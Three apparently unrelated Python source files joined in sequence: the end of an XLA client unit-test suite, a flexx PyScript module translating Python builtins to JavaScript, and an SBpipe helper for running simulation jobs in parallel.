self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
class ErrorTest(LocalComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(LocalComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
|
"""
Python Builtins
---------------
Most buildin functions (that make sense in JS) are automatically
translated to JavaScript: isinstance, issubclass, callable, hasattr,
getattr, setattr, delattr, print, len, max, min, chr, ord, dict, list,
tuple, range, pow, sum, round, int, float, str, bool, abs, divmod, all,
any, enumerate, zip, reversed, sorted, filter, map.
Further all methods for list, dict and str are implemented (except str
methods: encode, decode, format, format_map, isdecimal, isdigit,
isprintable, maketrans).
.. pyscript_example::
# "self" is replaced with "this"
self.foo
# Printing just works
print('some test')
print(a, b, c, sep='-')
# Getting the length of a string or array
len(foo)
# Rounding and abs
round(foo) # round to nearest integer
int(foo) # round towards 0 as in Python
abs(foo)
# min and max
min(foo)
min(a, b, c)
max(foo)
max(a, b, c)
# divmod
a, b = divmod(100, 7) # -> 14, 2
# Aggregation
sum(foo)
all(foo)
any(foo)
# Turning things into numbers, bools and strings
str(s)
float(x)
bool(y)
int(z) # this rounds towards zero like in Python
chr(65) # -> 'A'
ord('A') # -> 65
# Turning things into lists and dicts
dict([['foo', 1], ['bar', 2]]) # -> {'foo': 1, 'bar': 2}
list('abc') # -> ['a', 'b', 'c']
dict(other_dict) # make a copy
list(other_list) # make copy
The isinstance function (and friends)
-------------------------------------
The ``isinstance()`` function works for all JS primitive types, but also
for user-defined classes.
.. pyscript_example::
# Basic types
isinstance(3, float) # in JS there are no ints
isinstance('', str)
isinstance([], list)
isinstance({}, dict)
isinstance(foo, types.FunctionType)
# Can also use JS strings
isinstance(3, 'number')
isinstance('', 'string')
isinstance([], 'array')
isinstance({}, 'object')
isinstance(foo, 'function')
# You can use it on your own types too ...
isinstance(x, MyClass)
isinstance(x, 'MyClass') # equivalent
isinstance(x, 'Object') # also yields true (subclass of Object)
# issubclass works too
issubclass(Foo, Bar)
# As well as callable
callable(foo)
hasattr, getattr, setattr and delattr
-------------------------------------
.. pyscript_example::
a = {'foo': 1, 'bar': 2}
hasattr(a, 'foo') # -> True
hasattr(a, 'fooo') # -> False
hasattr(null, 'foo') # -> False
getattr(a, 'foo') # -> 1
getattr(a, 'fooo') # -> raise AttributeError
getattr(a, 'fooo', 3) # -> 3
getattr(null, 'foo', 3) # -> 3
setattr(a, 'foo', 2)
delattr(a, 'foo')
Creating sequences
------------------
.. pyscript_example::
range(10)
range(2, 10, 2)
range(100, 0, -1)
reversed(foo)
sorted(foo)
enumerate(foo)
zip(foo, bar)
filter(func, foo)
map(func, foo)
List methods
------------
.. pyscript_example::
# Call a.append() if it exists, otherwise a.push()
a.append(x)
# Similar for remove()
a.remove(x)
Dict methods
------------
.. pyscript_example::
a = {'foo': 3}
a['foo']
a.get('foo', 0)
a.get('foo')
a.keys()
Str methods
-----------
.. pyscript_example::
"foobar".startswith('foo')
"foobar".replace('foo', 'bar')
"foobar".upper()
Using JS specific functionality
-------------------------------
When writing PyScript inside Python modules, we recommend that where
specific JavaScript functionality is used, that the references are
prefixed with ``window.`` Where ``window`` represents the global JS
namespace. All global JavaScript objects, functions, and variables
automatically become members of the ``window`` object. This helps
make it clear that the functionality is specific to JS, and also
helps static code analysis tools like flake8.
.. pyscript_example::
from flexx.pyscript import window # this is a stub
def foo(a):
return window.Math.cos(a)
Aside from ``window``, ``flexx.pyscript`` also provides ``undefined``,
``Inifinity``, and ``NaN``.
"""
from . import commonast as ast
from . import stdlib
from .parser2 import Parser2, JSError, unify # noqa
from .stubs import RawJS
# This class has several `function_foo()` and `method_bar()` methods
# to implement corresponding functionality. Most of these are
# auto-generated from the stdlib. However, some methods need explicit
# implementation, e.g. to parse keyword arguments, or are inlined rather
# than implemented via the stlib.
#
# Note that when the number of arguments does not match, almost all
# functions raise a compile-time error. The methods, however, will
# bypass the stdlib in this case, because it is assumed that the user
# intended to call a special method on the object.
class Parser3(Parser2):
""" Parser to transcompile Python to JS, allowing more Pythonic
code, like ``self``, ``print()``, ``len()``, list methods, etc.
"""
def function_this_is_js(self, node):
# Note that we handle this_is_js() shortcuts in the if-statement
# directly. This replacement with a string is when this_is_js()
# is used outside an if statement.
if len(node.arg_nodes) != 0:
raise JSError('this_is_js() expects zero arguments.')
return ('"this_is_js()"')
def function_RawJS(self, node):
if len(node.arg_nodes) == 1:
if not isinstance(node.arg_nodes[0], ast.Str):
raise JSError('RawJS needs a verbatim string (use multiple '
'args to bypass PyScript\'s RawJS).')
lines = RawJS._str2lines(node.arg_nodes[0].value)
indent = (self._indent * 4) * ' '
return '\n'.join([indent + line for line in lines])
else:
return None # maybe RawJS is a thing
## Python buildin functions
def function_isinstance(self, node):
if len(node.arg_nodes) != 2:
raise JSError('isinstance() expects two arguments.')
ob = unify(self.parse(node.arg_nodes[0]))
cls = unify(self.parse(node.arg_nodes[1]))
if cls[0] in '"\'':
cls = cls[1:-1] # remove quotes
BASIC_TYPES = ('number', 'boolean', 'string', 'function', 'array',
'object', 'null', 'undefined')
MAP = {'[int, float]': 'number', '[float, int]': 'number', 'float': 'number',
'str': 'string', 'basestring': 'string', 'string_types': 'string',
'bool': 'boolean',
'FunctionType': 'function', 'types.FunctionType': 'function',
'list': 'array', 'tuple': 'array',
'[list, tuple]': 'array', '[tuple, list]': 'array',
'dict': 'object',
}
cmp = MAP.get(cls, cls)
if cmp.lower() in BASIC_TYPES:
# Basic type, use Object.prototype.toString
# http://stackoverflow.com/questions/11108877
return ["({}).toString.call(",
ob,
").match(/\s([a-zA-Z]+)/)[1].toLowerCase() === ",
"'%s'" % cmp.lower()
]
else:
# User defined type, use instanceof
# http://tobyho.com/2011/01/28/checking-types-in-javascript/
cmp = unify(cls)
if cmp[0] == '(':
raise JSError('isinstance() can only compare to simple types')
return ob, " instanceof ", cmp
def function_issubclass(self, node):
# issubclass only needs to work on custom classes
if len(node.arg_nodes) != 2:
raise JSError('issubclass() expects two arguments.')
cls1 = unify(self.parse(node.arg_nodes[0]))
cls2 = unify(self.parse(node.arg_nodes[1]))
if cls2 == 'object':
cls2 = 'Object'
return '(%s.prototype instanceof %s)' % (cls1, cls2)
def function_print(self, node):
# Process keywords
sep, end = '" "', ''
for kw in node.kwarg_nodes:
if kw.name == 'sep':
sep = ''.join(self.parse(kw.value_node))
elif kw.name == 'end':
end = ''.join(self.parse(kw.value_node))
elif kw.name in ('file', 'flush'):
raise JSError('print() file and flush args not supported')
else:
raise JSError('Invalid argument for print(): %r' % kw.name)
# Combine args
args = [unify(self.parse(arg)) for arg in node.arg_nodes]
end = (" + %s" % end) if (args and end and end != '\n') else ''
combiner = ' + %s + ' % sep
args_concat = combiner.join(args) or '""'
return 'console.log(' + args_concat + end + ')'
def function_len(self, node):
if len(node.arg_nodes) == 1:
return unify(self.parse(node.arg_nodes[0])), '.length'
else:
return None # don't apply this feature
def function_max(self, node):
if len(node.arg_nodes) == 0:
raise JSError('max() needs at least one argument')
elif len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return 'Math.max.apply(null, ', arg, ')'
else:
args = ', '.join([unify(self.parse(arg)) for arg in node.arg_nodes])
return 'Math.max(', args, ')'
def function_min(self, node):
if len(node.arg_nodes) == 0:
raise JSError('min() needs at least one argument')
elif len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return 'Math.min.apply(null, ', arg, ')'
else:
args = ', '.join([unify(self.parse(arg)) for arg in node.arg_nodes])
return 'Math.min(', args, ')'
def function_callable(self, node):
if len(node.arg_nodes) == 1:
arg = unify(self.parse(node.arg_nodes[0]))
return '(typeof %s === "function")' % arg
else:
raise JSError('callable() needs at least one argument')
def function_chr(self, node):
if len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return 'String.fromCharCode(%s)' % arg
else:
raise JSError('chr() needs at least one argument')
def function_ord(self, node):
if len(node.arg_nodes) == 1:
arg = ''.join(self.parse(node.arg_nodes[0]))
return '%s.charCodeAt(0)' % arg
else:
raise JSError('ord() needs at least one argument')
def function_dict(self, node):
if len(node.arg_nodes) == 0:
kwargs = ['%s:%s' % (arg.name, unify(self.parse(arg.value_node)))
for arg in node.kwarg_nodes]
return '{%s}' % ', '.join(kwargs)
if len(node.arg_nodes) == 1:
return self.use_std_function('dict', node.arg_nodes)
else:
raise JSError('dict() needs at least one argument')
def function_list(self, node):
if len(node.arg_nodes) == 0:
return '[]'
if len(node.arg_nodes) == 1:
return self.use_std_function('list', node.arg_nodes)
else:
raise JSError('list() needs at least one argument')
def function_tuple(self, node):
return self.function_list(node)
def function_range(self, node):
if len(node.arg_nodes) == 1:
args = ast.Num(0), node.arg_nodes[0], ast.Num(1)
return self.use_std_function('range', args)
elif len(node.arg_nodes) == 2:
args = node.arg_nodes[0], node.arg_nodes[1], ast.Num(1)
return self.use_std_function('range', args)
elif len(node.arg_nodes) == 3:
return self.use_std_function('range', node.arg_nodes)
else:
raise JSError('range() needs 1, 2 or 3 arguments')
def function_sorted(self, node):
if len(node.arg_nodes) == 1:
key, reverse = ast.Name('undefined'), ast.NameConstant(False)
for kw in node.kwarg_nodes:
if kw.name == 'key':
key = kw.value_node
elif kw.name == 'reverse':
reverse = kw.value_node
else:
raise JSError('Invalid keyword argument for sorted: %r' % kw.name)
return self.use_std_function('sorted', [node.arg_nodes[0], key, reverse])
else:
raise JSError('sorted() needs one argument')
## Methods of list/dict/str
def method_sort(self, node, base):
if len(node.arg_nodes) == 0: # sorts args are keyword-only
key, reverse = ast.Name('undefined'), ast.NameConstant(False)
for kw in node.kwarg_nodes:
if kw.name == 'key':
key = kw.value_node
elif kw.name == 'reverse':
reverse = kw.value_node
else:
raise JSError('Invalid keyword argument for sort: %r' % kw.name)
return self.use_std_method(base, 'sort', [key, reverse])
# Add functions and methods to the class, using the stdib functions ...
def make_function(name, nargs, function_deps, method_deps):
def function_X(self, node):
if node.kwarg_nodes:
raise JSError('Function %s does not support keyword args.' % name)
if len(node.arg_nodes) not in nargs:
raise JSError('Function %s needs #args in %r.' % (name, nargs))
for dep in function_deps:
self.use_std_function(dep, [])
for dep in method_deps:
self.use_std_method('x', dep, [])
return self.use_std_function(name, node.arg_nodes)
return function_X
def make_method(name, nargs, function_deps, method_deps):
def method_X(self, node, base):
if node.kwarg_nodes:
raise JSError('Method %s does not support keyword args.' % name)
if len(node.arg_nodes) not in nargs:
return None # call as-is, don't use our variant
for dep in function_deps:
self.use_std_function(dep, [])
for dep in method_deps:
self.use_std_method('x', dep, [])
return self.use_std_method(base, name, node.arg_nodes)
return method_X
for name, code in stdlib.METHODS.items():
nargs, function_deps, method_deps = stdlib.get_std_info(code)
if nargs and not hasattr(Parser3, 'method_' + name):
m = make_method(name, tuple(nargs), function_deps, method_deps)
setattr(Parser3, 'method_' + name, m)
for name, code in stdlib.FUNCTIONS.items():
nargs, function_deps, method_deps = stdlib.get_std_info(code)
if nargs and not hasattr(Parser3, 'function_' + name):
m = make_function(name, tuple(nargs), function_deps, method_deps)
setattr(Parser3, 'function_' + name, m)
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Piero Dalle Pezze
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# Object: Execute the model several times for deterministic or stochastic analysis
from __future__ import print_function
import logging
import sys
import os
import multiprocessing
import subprocess
import shlex
from time import sleep
logger = logging.getLogger('sbpipe')
def run_cmd(cmd):
"""
Run a command using Python subprocess.
:param cmd: The string of the command to run
"""
if sys.version_info > (3,):
with subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
out, err = p.communicate()
else:
p = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return out, err
def run_cmd_block(cmd):
"""
Run a command using Python subprocess. Block the call until the command has finished.
:param cmd: A tuple containing the string of the command to run
"""
p = subprocess.call(shlex.split(cmd))
def parcomp(cmd, cmd_iter_substr, output_dir, cluster='local', runs=1, local_cpus=1, output_msg=False,
colnames=[]):
"""
Generic function to run a command in parallel
:param cmd: the command string to run in parallel
:param cmd_iter_substr: the substring of the iteration number. This will be replaced in a number automatically
:param output_dir: the output directory
:param cluster: the cluster type among local (Python multiprocessing), sge, or lsf
:param runs: the number of runs. Ignored if colnames is not empty
:param local_cpus: the number of cpus to use at most
:param output_msg: print the output messages on screen (available for cluster='local' only)
:param colnames: the name of the columns to process
:return: True if the computation succeeded.
"""
logger.debug("Parallel computation using " + cluster)
logger.debug("Command: " + cmd)
logger.debug("Iter ID string: " + cmd_iter_substr)
logger.debug("# runs: " + str(runs))
if cluster == "sge" or cluster == "lsf":
out_dir = os.path.join(output_dir, 'out')
err_dir = os.path.join(output_dir, 'err')
if not os.path.exists(out_dir):
os.makedirs(out_dir)
if not os.path.exists(err_dir):
os.makedirs(err_dir)
if cluster == "sge": # use SGE (Sun Grid Engine)
return run_jobs_sge(cmd, cmd_iter_substr, out_dir, err_dir, runs, colnames)
elif cluster == "lsf": # use LSF (Platform Load Sharing Facility)
return run_jobs_lsf(cmd, cmd_iter_substr, out_dir, err_dir, runs, colnames)
else: # use local by default (python multiprocessing). This is configured to work locally using multi-core.
if cluster != "local":
logger.warning(
"Variable cluster is not set correctly in the configuration file. "
"Values are: `local`, `lsf`, `sge`. Running `local` by default")
return run_jobs_local(cmd, cmd_iter_substr, runs, local_cpus, output_msg, colnames)
def progress_bar(it, total):
"""
A minimal CLI progress bar.
:param it: current iteration starting from 1
:param total: total iterations
"""
percent = '(' + ("{0:.1f}").format(100 * (it / float(total))) + '%)'
progress = str(it) + ' of ' + str(total)
print('\r%s %s %s' % ('Initialised:', progress, percent), end='\r')
if it == total:
print()
def progress_bar2(it, total):
"""
A CLI progress bar.
:param it: current iteration starting from 1
:param total: total iterations
"""
percent = ("{0:.1f}").format(100 * (it / float(total)))
length = 50
filled = int(length * it // total)
bar = '#' * filled + '-' * (length - filled)
progress = '(' + str(it) + ' of ' + str(total) + ')'
print('\r%s |%s| %s%% %s' % ('Progress:', bar, percent, progress), end='\r')
if it == total:
print()
def call_proc(params):
"""
Run a command using Python subprocess.
:param params: A tuple containing (the string of the command to run, the command id)
"""
cmd, id, runs, handler_level = params
if handler_level <= logging.INFO:
progress_bar(id, runs)
if sys.version_info > (3,):
with subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
out, err = p.communicate()
else:
p = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return out, err
def run_jobs_local(cmd, cmd_iter_substr, runs=1, local_cpus=1, output_msg=False, colnames=[]):
"""
Run jobs using python multiprocessing locally.
:param cmd: the full command to run as a job
:param cmd_iter_substr: the substring in command to be replaced with a number
:param runs: the number of runs. Ignored if colnames is not empty
:param local_cpus: The number of available cpus. If local_cpus <=0, only one core will be used.
:param output_msg: print the output messages on screen (available for cluster_type='local' only)
:param colnames: the name of the columns to process
:return: True
"""
# Create a Pool.
pool = multiprocessing.Pool(1)
if local_cpus > 0:
if local_cpus <= multiprocessing.cpu_count():
# Create a pool with local_cpus
pool = multiprocessing.Pool(local_cpus)
logger.debug('Initialised multiprocessing.Pool with ' + str(local_cpus))
else:
logger.warning('`local_cpus` is higher than the physical number of CPUs (' +
str(multiprocessing.cpu_count()) + '). Setting `local_cpus` to ' +
str(multiprocessing.cpu_count()))
pool = multiprocessing.Pool(multiprocessing.cpu_count())
logger.info("Starting computation...")
results = []
# get the current level for the StreamHandler
# this must be executed at run-time
if len(logger.handlers) > 1:
handler_level = logger.handlers[1].level
else:
handler_level = logging.INFO
if len(colnames) > 0:
runs = len(colnames)
for i, column in enumerate(colnames):
command = cmd.replace(cmd_iter_substr, column)
logger.debug(command)
params = (command, i+1, runs, handler_level)
results.append(pool.apply_async(call_proc, (params,)))
else:
for i in range(0, runs):
command = cmd.replace(cmd_iter_substr, str(i+1))
logger.debug(command)
params = (command, i+1, runs, handler_level)
results.append(pool.apply_async(call_proc, (params,)))
# Close the pool and wait for each running task to complete
pool.close()
pool.join()
failed = 0
for result in results:
out, err = result.get()
# convert byte to str. Necessary for Python 3+.
# this is also compatible with Python 2.7
out = out.decode('utf-8')
err = err.decode('utf-8')
if 'error' in err.lower():
logger.error('\n' + err)
failed += 1
elif 'warning' in err.lower():
logger.warning('\n' + err)
else:
logger.debug('\n' + err)
if 'error' in out.lower():
logger.error('\n' + out)
elif 'warning' in out.lower():
logger.warning('\n' + out)
else:
if output_msg:
logger.info('\n' + out)
else:
logger.debug('\n' + out)
# Print the status of the parallel computation.
logger.info("Computation terminated.")
if failed == runs:
logger.warning('All computations seem to have errors in the standard error.')
logger.warning("For additional information, run SBpipe using the `--verbose` option.")
# return False
elif failed > 0:
logger.warning("Some computation might have failed. Do all output files exist?")
logger.warning("For additional information, run SBpipe using the `--verbose` option.")
else:
logger.info("If errors occur, check that " + cmd.split(" ")[0] + " runs correctly.")
